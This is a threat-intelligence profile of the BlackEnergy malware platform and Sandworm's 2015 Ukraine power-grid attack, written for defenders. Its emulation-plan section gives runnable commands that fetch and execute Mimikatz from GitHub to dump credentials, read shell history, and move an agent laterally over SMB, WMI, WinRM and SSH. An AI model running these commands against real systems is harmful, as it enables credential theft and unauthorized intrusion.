Home/Threat Actor/BlackEnergy
Threat Actor

BlackEnergy

blackenergy · russia_apt_sandworm · active since 2007

BlackEnergy (canonical malware naming with generational variants BlackEnergy 1 ~2007 DDoS underground tool + BlackEnergy 2 ~2010-2013 HMI-targeting industrial process capability + BlackEnergy 3 modular plugin architecture used in 2015 Ukraine power grid attack; KillDisk signature wiper companion deployed for restoration-delay amplification) is Sandworm Team's (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard, curated separately as sandworm_team parent operator) signature pre-Industroyer ICS- targeting malware platform, the first publicly acknowledged successful cyberattack on a power grid per the December 23, 2015 Ukraine attack against three energy distribution companies (Prykarpattyaoblenergo most affected with 30 substations switched off including 7×110kV + 23×35kV, ~230,000 customers without electricity 1-6 hours in freezing temperatures, up to 73 MWh not supplied.

alongside Chernivtsioblenergo + Kyivoblenergo)

standalone malware platform cluster paralleling industroyer + notpetya + olympic_destroyer in the Sandworm-platform-family cell.

canonical attribution chain via iSIGHT Partners October 2014 Sandworm Team naming disclosure (Frank Hatheway + John Hultquist + Stephen Ward, Dune-novel references in BlackEnergy malware codebase, CVE-2014-4114 Windows INF/PowerPoint zero-day exploitation targeting Ukrainian government + EU/NATO officials), Mandiant BlackEnergy 3 "calling card" assessment, US Deputy Energy Secretary Elizabeth Sherwood-Randall February 2016 first public US attribution to Russia, Ukrainian government February 2017 formal attribution, US DOJ October 15, 2020 indictment of 6 GRU Unit 74455 officers (Yuriy Sergeyevich Andrienko et al. per MITRE ATT&CK Campaign C0028 reference)

SANS/E-ISAC canonical March 18, 2016 "Analysis of the Cyber Attack on the Ukrainian Power Grid: Defense Use Case" by Robert M. Lee + Michael J. Assante + Tim Conway established canonical Stage 1 access tool (BlackEnergy 3 Office macro spear-phishing) + Stage 2 restoration-delay amplifier (KillDisk wiper) framework with critical clarification "Neither BlackEnergy 3, unreported backdoors, KillDisk, nor the malicious firmware uploads alone were responsible for the outage. Each was simply a component of the cyber attack", actual outage caused by direct adversary interaction with ICS control systems via stolen VPN credentials - RDP-driven circuit breaker manipulation ("the keyboard and mouse of their PCs started moving without human interaction" per Security Boulevard) over ~10-minute attack window; signature tradecraft includes 6+ months pre-positioning reconnaissance via Office macro spear-phishing (employee Excel attachment opening spring 2015 per ISA Lessons Learned), corporate VPN abuse for IT-to-OT pivot, direct interactive RDP session for circuit breaker manipulation, KillDisk Stage 2 restoration-delay tradecraft (MBR corruption + Windows HMI in RTU overwrite), serial-to-Ethernet gateway firmware corruption with random code (substation device destruction), UPS scheduled disconnect via remote management interface (control center recovery interference), telephone denial-of-service against customer call centers (customer recovery interference); also linked to October 2014 Ukrainian elections destructive malware per Mandiant.

TeleBots backdoor framework adjacent signature ESET-disclosed code link to subsequent Industroyer + NotPetya Sandworm-platform- family clusters.

multi-generational platform evolution from criminal DDoS tool to nation-state ICS-targeting modular framework signature pattern.

canonical industry baseline reference for "first publicly acknowledged successful cyberattack on a power grid" cited in essentially all subsequent ICS-targeting cyber- operation industry analyses through 2014-2026 period; Andy Greenberg "Sandworm" book (2019) canonical chronicle.

cluster fills generational predecessor position in Sandworm-platform-family chronology: BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Industroyer2 2022.

russia_apt_sandworm confidence: high 18 aliases
Sigma rules200 YARA rules23 Live IOCs0 CVEs exploited2

Profile

BlackEnergy (canonical malware naming with generational variants BlackEnergy 1 ~2007 DDoS underground tool + BlackEnergy 2 HMI targeting + BlackEnergy 3 modular plugin architecture used in 2015 Ukraine power grid attack.

KillDisk signature wiper companion) is Sandworm Team's signature pre-Industroyer ICS-targeting malware platform, the first publicly acknowledged successful cyberattack on a power grid per the December 23, 2015 Ukraine attack that caused 230,000 consumers to lose electricity for 1-6 hours. Standalone malware platform cluster paralleling industroyer + notpetya + olympic_destroyer in the Sandworm-platform-family cell distinct from sandworm_team parent operator cluster.

Multi-generational platform evolution
  • BlackEnergy 1 (~2007): DDoS underground criminal tool.
  • BlackEnergy 2 (2010-2013): HMI-targeting industrial process capability.
  • BlackEnergy 3 (2014+): modular plugin architecture + Sandworm signature calling card Attribution chain: iSIGHT Partners October 2014 canonical Sandworm Team naming (Dune-novel references in code) + CVE-2014-4114 Windows INF/PowerPoint zero-day disclosure; Mandiant BlackEnergy 3 as Sandworm calling card; US Deputy Energy Secretary February 2016 attribution; Ukrainian government February 2017 attribution; US DOJ October 15, 2020 indictment of 6 GRU Unit 74455 officers. 2015 Ukraine power grid attack architecture per SANS/ E-ISAC canonical Defense Use Case:.
  • 6+ months pre-positioning reconnaissance via BlackEnergy 3 Office macro spear-phishing (employee Excel attachment opening spring 2015)
  • December 23, 2015 attack execution: three oblenergos in parallel (Prykarpattyaoblenergo + Chernivtsioblenergo + Kyivoblenergo), 30 substations switched off via RDP-driven circuit breaker manipulation ("the keyboard and mouse of their PCs started moving without human interaction" per Security Boulevard); attack lasted ~10 minutes.
  • Restoration-delay amplifiers: KillDisk wiped Windows systems + HMIs (MBR corruption); serial-to- Ethernet gateway firmware corrupted with random code; UPS scheduled disconnect at control centers; telephone DoS against customer call centers Critical SANS/E-ISAC clarification: actual outage caused by direct adversary interaction with ICS control systems, BlackEnergy 3 was Stage 1 access tool + KillDisk was Stage 2 restoration-delay amplifier, not direct outage cause.
Signature operational tradecraft
  • Multi-generational platform with Sandworm "calling card" status (BE3 signature).
  • Office macro spear-phishing delivery (signature Microsoft Word + Excel attachments with macros)
  • Corporate VPN abuse for IT-to-OT pivot.
  • Direct interactive RDP session for circuit breaker manipulation (signature operator-blame-pattern adjacent to Stuxnet operator-display manipulation)
  • KillDisk Stage 2 restoration-delay tradecraft (MBR corruption + HMI overwrite)
  • Serial-to-Ethernet gateway firmware corruption (substation device destruction with random code)
  • UPS scheduled disconnect via remote management interface (control center recovery interference)
  • Telephone DoS against customer call centers (customer recovery interference)
  • CVE-2014-4114 INF/PowerPoint zero-day (iSIGHT October 2014 canonical disclosure)
  • TeleBots backdoor framework adjacent (signature ESET-disclosed code link to Industroyer + NotPetya) The cluster fills generational predecessor position in Sandworm-platform-family chronology: BlackEnergy 2015.
  • Industroyer 2016.
  • NotPetya 2017.
  • Industroyer2 2022.

Aliases

18
blackenergyblack energyblackenergy_2blackenergy2blackenergy_3blackenergy3be2be3blackenergy_aptblackenergy_malwareblackenergy litekilldiskkilldisk_wiperkilldisk malwareblackenergy ukraine power grid 2015first power grid cyberattack 2015blackenergy 3 sandworm calling cardblackenergy spearphishing office macro

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
8 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
10 execution T1047 · Windows Management Instrumentation windows
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

9
2016-2017US + Ukrainian Government Attribution (February 2016 / February 2017)
2016SANS / E-ISAC Canonical Analysis (March 18, 2016)
2015BlackEnergy 3 Pre-positioning Reconnaissance (Spring-Summer 2015)
20152015 Ukraine Power Grid Attack (December 23, 2015)
2014-2026Continued Industry Reference Status (2014-2026)
2014iSIGHT Sandworm Team Canonical Naming + CVE-2014-4114 (October 2014)
2014Ukrainian Elections Destructive Malware (October 2014)
2010-2013BlackEnergy 2, Human-Machine Interface Targeting
2007-2010BlackEnergy Origin (~2007), DDoS Underground Tool

Attribution & Reporting

Attributed by
iSIGHT Partners (canonical October 2014 Sandworm Team naming disclosure, Frank Hatheway + John Hultquist + Stephen Ward)Mandiant / Google Cloud Threat Intelligence Group (canonical Sandworm + BlackEnergy 3 calling card analysis)ESET WeLiveSecurity (canonical BlackEnergy + KillDisk technical analysis, Anton Cherepanov + Robert Lipovsky)SANS Industrial Control Systems (canonical March 18 2016 Ukraine power grid attack analysis)Electricity Information Sharing and Analysis Center E-ISAC (canonical SANS-collaborative analysis)CISA / ICS-CERT (canonical IR-ALERT-H-16-056-01 government technical analysis)Dragos (Robert M. Lee, canonical ELECTRUM threat group analysis)Trend Micro (Sandworm to Blacken, SCADA Connection October 16 2014)McAfee Labs (Raj Samani + Christiaan Beek, Updated BlackEnergy Trojan Grows More Powerful January 14 2016)Booz Allen Hamilton (When The Lights Went Out 2016 canonical incident analysis)Andy Greenberg (WIRED, How an Entire Nation Became Russia's Test Lab for Cyberwar June 28 2017 + canonical Sandworm book)Symantec (BlackEnergy 3 + KillDisk verification)CrowdStrike (Voodoo Bear canonical Sandworm tracking)Microsoft Threat Intelligence Center (Seashell Blizzard / Iridium canonical Sandworm tracking)Secureworks (Iron Viking canonical Sandworm tracking)US Department of Justice (October 15 2020 indictment of 6 GRU Unit 74455 officers per Scott W. Brady)US Deputy Energy Secretary Elizabeth Sherwood-Randall (February 2016 first public US attribution)CERT-UA Ukrainian Computer Emergency Response TeamMITRE ATT&CK Campaign C0028 (2015 Ukraine Electric Power Attack)
Key reporting
reportiSIGHT Partners (Frank Hatheway + John Hultquist + Stephen Ward): Sandworm Team canonical naming disclosure + CVE-2014-4114 (October 2014)
reportMandiant / Google Cloud: Sandworm Team and the Ukrainian Power Authority Attacks, canonical BlackEnergy 3 calling card analysis
reportSANS Industrial Control Systems + E-ISAC (Robert M. Lee + Michael J. Assante + Tim Conway): Analysis of the Cyber Attack on the Ukrainian Power Grid, Defense Use Case (March 18, 2016), canonical Stage 1/Stage 2 framework
reportCISA / ICS-CERT: IR-ALERT-H-16-056-01 Cyber-Attack Against Ukrainian Critical Infrastructure, canonical US government technical analysis
reportESET WeLiveSecurity (Anton Cherepanov + Robert Lipovsky): BlackEnergy + KillDisk technical analysis
reportTrend Micro: Sandworm to Blacken, The SCADA Connection (October 16, 2014)
reportMcAfee Labs (Raj Samani + Christiaan Beek): Updated BlackEnergy Trojan Grows More Powerful (January 14, 2016)
reportBooz Allen Hamilton: When The Lights Went Out (2016), canonical incident analysis
reportAndy Greenberg (WIRED): How an Entire Nation Became Russia's Test Lab for Cyberwar (June 28, 2017) + canonical Sandworm book (2019)
reportSymantec: BlackEnergy 3 + KillDisk verification analysis
reportMITRE ATT&CK Campaign C0028: 2015 Ukraine Electric Power Attack
reportMITRE ATT&CK Software S0089: BlackEnergy
reportMITRE ATT&CK Software S0166: KillDisk
reportUS Department of Justice (Scott W. Brady): October 15, 2020 indictment of 6 GRU Unit 74455 officers, United States vs. Yuriy Sergeyevich Andrienko et al.
reportMalpedia Software Profile: BlackEnergy

Operational

State sponsor

Russian state-sponsored APT, specifically Sandworm Team (GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Dragos ELECTRUM / Secureworks Iron Viking / CrowdStrike Voodoo Bear, curated separately as sandworm_team parent operator cluster). Attribution chain: (1) iSIGHT Partners October 2014 canonical Sandworm Team naming disclosure: per Mandiant/Google Cloud blog retrospective + Henry Jackson School analysis: iSIGHT Partners published canonical Sandworm Team naming October 2014 based on Dune-novel references in BlackEnergy malware codebase. Disclosure included CVE-2014-4114 INF/PowerPoint zero-day exploitation targeting Ukrainian government officials + EU/NATO + industrial control systems reconnaissance.

(2) BlackEnergy 3 as Sandworm "calling card": per Mandiant: "we have linked Sandworm Team to the incident, principally based on BlackEnergy 3, the malware that has become their calling card." BlackEnergy 3 represents Sandworm's signature ICS-targeting modular platform capability. (3) US Deputy Energy Secretary February 2016 attribution: per Henry Jackson School: "In February 2016, U.S. Deputy Energy Secretary Elizabeth Sherwood- Randall attributed the first attack on the Ukrainian grid to Russia at a meeting with U.S. energy industry executives." First public US government attribution to Russia for 2015 Ukraine power grid attack.

(4) SANS/E-ISAC March 18, 2016 canonical attack analysis: SANS Industrial Control Systems + Electricity Information Sharing and Analysis Center published canonical "Analysis of the Cyber Attack on the Ukrainian Power Grid: Defense Use Case", operationally established canonical BlackEnergy 3 + KillDisk Stage 1/ Stage 2 attack architecture analysis. (5) Ukrainian government February 2017 formal attribution: Ukrainian officials made formal attribution to Russian security services and Sandworm per Henry Jackson School analysis. (6) US Department of Justice October 15, 2020 indictment: 6 GRU Unit 74455 officers indicted including for Ukraine power grid attacks (Yuriy Sergeyevich Andrienko et al. per MITRE ATT&CK Campaign C0028 reference).

Operational target profile: 2015 Ukraine power grid attack (December 23, 2015): Three Ukrainian energy distribution companies (oblenergos)
  • Prykarpattyaoblenergo (Ivano-Frankivsk Oblast): most affected, 30 substations switched off (7× 110kV + 23× 35kV), 230,000 people without electricity for 1-6 hours.
  • Chernivtsioblenergo: also affected.
  • Kyivoblenergo: also affected Per CISA/ICS-CERT IR-ALERT-H-16-056-01 + SANS/E-ISAC canonical analysis: BlackEnergy 3 used as initial access vector via spear-phishing emails with malicious Microsoft Office (Word + Excel) attachments containing macros. After 6+ months reconnaissance, attackers seized SCADA control + remotely switched 30 substations off + KillDisk wiped Windows systems + serial-to- Ethernet gateway firmware corrupted + UPS disabled + telephone DoS against call centers. Up to 73 MWh electricity not supplied (~0.015% of daily Ukraine consumption) per Wikipedia. Critical SANS/E-ISAC clarification: "Neither BlackEnergy 3, unreported backdoors, KillDisk, nor the malicious firmware uploads alone were responsible for the outage. Each was simply a component of the cyber attack for the purposes of access and delay of restoration." Actual outage caused by direct adversary interaction with ICS control systems, BlackEnergy 3 = Stage 1 access tool + KillDisk = Stage 2 restoration-delay amplifier. Multi-generational platform context: Per Trend Micro + McAfee + Henry Jackson School:.
  • BlackEnergy 1 (~2007): original DDoS attack tool used in underground criminal market.
  • BlackEnergy 2: tailored for human-machine interfaces controlling industrial processes.
  • BlackEnergy 3: modular plugin architecture, more general capability, signature ICS-reconnaissance + Sandworm "calling card" Per CERT-UA: BlackEnergy 3 also linked to Ukrainian elections destructive malware October 2014 + Ukrainian media + regional power authority targeting throughout 2015. Operational pattern indicates broader BlackEnergy 3 access campaign across Ukraine 2015 with December 2015 power grid attack as culminating operation. The cluster represents Sandworm's pre-Industroyer signature ICS-targeting platform capability, operationally a generational predecessor in Sandworm- platform-family chronology (BlackEnergy 2015.
  • Industroyer 2016.
  • NotPetya 2017.
  • Industroyer2 2022).
Motivations
first_publicly_acknowledged_successful_cyberattack_on_power_grid_capability, ukrainian_power_grid_disruption_during_russia_ukraine_conflict, sandworm_signature_ics_targeting_malware_platform_calling_card, multi_generational_platform_evolution_ddos_to_ics_targeting, ukrainian_critical_infrastructure_pre_positioning_reconnaissance, russian_strategic_objective_post_crimea_annexation_ukrainian_energy_disruption, restoration_delay_via_killdisk_wiper_and_telephone_dos_tradecraft
Sectors
electric_utilitieselectrical_substationspower_distribution_companiesprykarpattyaoblenergochernivtsioblenergokyivoblenergoukrainian_government_officialscritical_infrastructure_operatorsukrainian_mediaeu_government_officialsnato_government_officialsics_scada_industrial_control_systemsukrainian_elections_infrastructure
Regions
ukraineeastern_europeeuropean_unionnato_member_countries

Techniques Used

60
T0814T0815T0816T0817T0822T0826T0827T0828T0829T0831T0843T0855T0857T0859T0863T0866T0879T1003T1003.001T1005T1010T1014T1016T1018T1020T1021T1021.001T1021.002T1021.004T1021.005T1021.006T1027T1027.002T1027.005T1029T1033T1036T1036.005T1037T1039T1041T1053T1053.005T1056T1056.001T1057T1059T1059.001T1059.003T1059.005T1059.007T1068T1069T1070T1070.004T1070.006T1071T1071.001T1074T1078

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)41/60 · 68%
Analytics (MITRE CAR)26/60 · 43%
Runtime / container (Falco)5/60 · 8%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)10/60 · 16%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
MASTER BOOT RECORD CORRUPTION KILLDISKMICROSOFT OFFICE WORD EXCEL MACRO SPEARPHISHING ATTACHMENTSANDWORM SIGNATURE ICS TARGETING PLATFORM PRE-INDUSTROYERSERIAL TO ETHERNET DEVICE FIRMWARE CORRUPTION WITH RANDOM CODESTOLEN VPN CREDENTIALS FOR ICS NETWORK PIVOT

CVEs Exploited

2
CVECVE-2014-4114
CVECVE-2015-2545
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin